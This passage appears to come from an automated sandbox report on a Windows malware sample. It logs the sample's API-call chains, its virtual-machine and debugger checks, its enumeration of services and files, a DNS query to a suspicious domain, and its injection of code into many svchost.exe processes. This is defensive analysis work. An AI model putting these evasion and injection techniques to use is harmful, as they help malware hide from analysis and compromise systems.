      Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,StrStrIW,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,10_2_0426C460
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04253C3010_2_04253C30
      Source: C:\Users\user\Desktop\file.exe TID: 6016Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 6140Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 2228Thread sleep count: 249 > 30Jump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 2424Thread sleep count: 803 > 30Jump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 2424Thread sleep time: -40150s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 6036Thread sleep count: 50 > 30Jump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 6036Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5580Thread sleep count: 44 > 30Jump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5580Thread sleep time: -44000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04265CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,10_2_04265CA0
      Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-7428
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,10_2_0426BD60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,LocalFree,CloseServiceHandle,10_2_04262FB0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,Sleep,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,10_2_0426BBC0
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 803Jump to behavior
      Source: C:\Windows\System32\svchost.exeWindow / User API: foregroundWindowGot 1756Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.8 %
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04253C3010_2_04253C30
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042645C0 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,10_2_042645C0
      Source: svchost.exe, 00000025.00000000.433581591.0000028290A81000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
      Source: svchost.exe, 0000000D.00000002.799867412.000001A748043000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (5>OVMware, Inc.eckiov eiittjuoxkos 2.0 B
      Source: svchost.exe, 00000025.00000000.430080546.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: svchost.exe, 00000018.00000000.326876428.000002468A852000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.797892432.000002468A852000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll370
      Source: svchost.exe, 00000023.00000002.798887868.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399702909.0000023E48858000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlles(x8
      Source: svchost.exe, 00000025.00000000.430080546.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System Product4B898T20D83542-CB48-FFC7-AA5E-D037A04953D7VMware, Inc.None
      Source: svchost.exe, 0000000B.00000000.288280921.0000022BAEE24000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.796087450.0000022BAEE24000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUSER\
      Source: svchost.exe, 0000000D.00000002.800559286.000001A74805E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.293232258.000001B37C254000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.298975078.000001B376A29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.535835347.000001B37C254000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.534611873.000001B376A29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.305992369.000001B37C254000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.291984725.000001B376A29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.313705020.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.315980525.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.316504731.000001F97F300000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000021.00000002.797892866.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11
      Source: svchost.exe, 00000021.00000002.796911847.000001E553A2F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: svchost.exe, 00000021.00000000.378168621.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000021.00000002.796911847.000001E553A2F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
      Source: svchost.exe, 00000025.00000000.433581591.0000028290A81000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_VideoController3MBGGNEFO7FKHN2VYV6DAV6920060621000000.000000-000NXLZ2F8PWin32_ComputerSystemVideoController1MSBDAdisplay.infVMware1280 x 1024 x 4294967296 colors(Standard display types)PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_VideoControllercomputer13412078Win32_VideoController
      Source: svchost.exe, 00000021.00000000.378006573.000001E553A13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}YSTE
      Source: svchost.exe, 00000021.00000002.796911847.000001E553A2F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
      Source: svchost.exe, 00000018.00000002.795993472.000002468A813000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DLL
      Source: svchost.exe, 00000021.00000002.798692467.000001E553A89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000021.00000000.378371524.000001E553B15000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonic\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DeviceArrival
      Source: svchost.exe, 00000014.00000000.311831262.000001DBFC23F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.797331619.000001DBFC23F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.798604321.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.321037559.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.318784862.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.331307823.0000025138C82000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.799756240.0000025138C82000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.797347672.00000226F8029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.336272904.00000226F8029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.343376985.000001959845A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.347951928.000001959845A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: svchost.exe, 0000001D.00000002.798014956.00000236F2C29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
      Source: svchost.exe, 0000000D.00000002.799480042.000001A748024000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (5>OVMware, Inc.eckiov eiittjuoxkos 2.0
      Source: svchost.exe, 0000000F.00000000.293266911.000001B37C268000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.535996451.000001B37C268000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.306103883.000001B37C268000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
      Source: svchost.exe, 00000021.00000002.798692467.000001E553A89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000015.00000000.315884425.000001F97EA29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.797033606.000001F97EA29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.313674893.000001F97EA29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0L
      Source: svchost.exe, 00000025.00000000.430080546.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareO7FKHN2VWin32_VideoController3MBGGNEFVideoController120060621000000.000000-00013412078display.infMSBDANXLZ2F8PPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsYV6DAV69
      Source: svchost.exe, 0000000D.00000003.292756908.000001A7480AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.eckiov eiittjuoxkos 2.0
      Source: svchost.exe, 00000021.00000002.797277995.000001E553A3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}
      Source: svchost.exe, 00000021.00000000.378006573.000001E553A13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000021.00000000.378168621.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000021.00000000.378006573.000001E553A13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000021.00000000.378168621.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000021.00000000.378168621.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 0000000D.00000002.798965763.000001A748013000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0426B0C0 GetTickCount,GetCurrentProcessId,gethostname,GetSystemInfo,RegOpenKeyW,RegQueryValueExW,RegCloseKey,GlobalMemoryStatusEx,CoInitialize,10_2_0426B0C0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04254C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,10_2_04254C20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04254E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,10_2_04254E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042556D0 FindFirstFileW,FindClose,10_2_042556D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042557F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,10_2_042557F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04256A40 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,10_2_04256A40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042542B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,10_2_042542B0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04289B29 FindFirstFileExA,10_2_04289B29
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042553D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,10_2_042553D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042673D0 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,10_2_042673D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04265CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,10_2_04265CA0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012D3 LoadLibraryA,GetProcAddress,_memset,ShellExecuteExW,0_2_004012D3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0427F37F mov eax, dword ptr fs:[00000030h]10_2_0427F37F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401CEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401CEB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040203F GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,___crtGetCommandLineW,___crtGetEnvironmentStringsW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit,0_2_0040203F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04261D40 SetEvent,InterlockedExchange,BlockInput,BlockInput,BlockInput,10_2_04261D40
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401CEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401CEB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040666A SetUnhandledExceptionFilter,__encode_pointer,0_2_0040666A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A7F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00403A7F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040668C __decode_pointer,SetUnhandledExceptionFilter,0_2_0040668C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A8D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_LocaleUpdate::_LocaleUpdate,0_2_00409A8D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0427ED1C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0427ED1C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0427667E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0427667E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04275EB6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_04275EB6

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\svchost.exeDomain query: g.agametog.com
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22BAF470000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B37C4A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DBFC860000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F97F060000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B6D5F40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2468AF80000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25139740000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 226F8C80000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195989A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 236F3320000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21BD8190000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F1ED140000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E554130000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AF62F80000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23E48FA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD8F7B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2828E500000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B667950000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12DBC450000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04269910 WaitForSingleObject,GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,CloseHandle,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,10_2_04269910
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: AF470000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C4A0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: FC860000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 7F060000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: D5F40000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 8AF80000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 39740000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: F8C80000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 989A0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: F3320000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: D8190000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: ED140000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 54130000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 62F80000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 48FA0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 8F7B0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 8E500000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 67950000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: BC450000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 22BAF470000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1B37C4A0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFC860000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1F97F060000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1B6D5F40000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2468AF80000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 25139740000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 226F8C80000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 195989A0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 236F3320000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 21BD8190000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1ED140000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1E554130000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1AF62F80000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 23E48FA0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD8F7B0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2828E500000Jump to behavior
